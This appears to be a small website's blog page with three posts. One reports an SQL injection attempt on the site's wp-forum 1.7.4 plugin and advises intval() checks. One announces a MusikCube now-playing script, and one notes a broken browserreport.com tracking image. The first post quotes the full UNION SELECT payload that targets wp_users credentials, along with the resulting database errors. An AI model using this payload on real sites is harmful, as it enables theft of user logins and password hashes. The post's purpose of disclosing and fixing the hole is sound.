Asylum-ET™

So some twit(or bot) attempted an SQL attack against our site. SQL Injection is a form of Code injection. There are many types of code injection. The definition of XSS includes SQL Injection as one of the methods.

This one used a crafty query in attempt to gain access to records from our databases.

http://asylum-et.com/?page_id=3&forumaction=showprofile

&user=1%20union%20select%20null,
concat(user_login,0x2f,user_pass,0x2f,user_email),
null,null,null,null,null%20from%20wp_users%20where%20id=1/*

which output this nice little bit

WordPress database error: [The used SELECT statements have a different number of columns]
SELECT count(*) FROM wp_forum_posts WHERE author_id = 1 union select null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null from wp_users where id=1/*

WordPress database error: [The used SELECT statements have a different number of columns]
SELECT * FROM wp_forum_posts WHERE author_id = 1 union select null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null from wp_users where id=1/* ORDER BY date DESC LIMIT 10

Unfortunate for this person this is not what they were after as a result since our database is not the standard WP database as well as the code not being the standard WP code but I have fixed the code so that not even this is output any more.

Please take note of this twits IP address.
88-232-152-90

I am glad that this attempt has been made because it alerted us to a vulnerability in the
wp-forum Version: 1.7.4 software. The author must have decided that sanity checks were useless because there was not a single one checking the data being passed for database queries.

If you are using this plugin you should at least go through and do an intval() on each of the $_GET variables that wp-forum has accessed directly in the queries. Hopefully the author
decides to release a security fix for their software but that wont effect us since we have
extensively altered our script to secure it. The original wp-forum can be found here http://www.fahlstad.se/wp-plugins/wp-forum

We have just added a new download for everyone. A php script that updates your website with your listening statistics and then gives example to output the information in your website to show your most recently played tracks without the need for a 3rd party.
MusikCube Now Playing Script

I noticed about a week or two ago that the http://browserreport.com image for tracking browser statistics has been broken. Did not think to much of it, just figured the server was under high load or whatever. So I stopped over to their site the other day to check it out and maybe find out what the problem was. I found when trying to access the image directly I see a php error that says the image create function that was being used was undefined. This means either they moved to a new server and this extension is not enabled in php or that their host disabled it or something to that effect. AT first I figured it was just a little boo boo. Nope still no change.

What had made me decide to even try to access the image directly was that their captcha for their comment form was not working and so I had to investigate that. Anyway we have no way of contacting them through their website to inform them and it seems evident from viewing the stats and how they went from firefox maxing the charts out for a steady coarse and then all of a sudden a mass swoop of ie as if every ie lover decided to load up their ie with an auto refresher/reloader and the servers admins decided to kill it.

Anyway we have removed the image at least for now until they are up and running again so our performance is not degraded by trying to access this dead image. We will leave any links on our site to them since we have hung in with them for some time now. Good luck over there guys and hope to see you up and running again soon.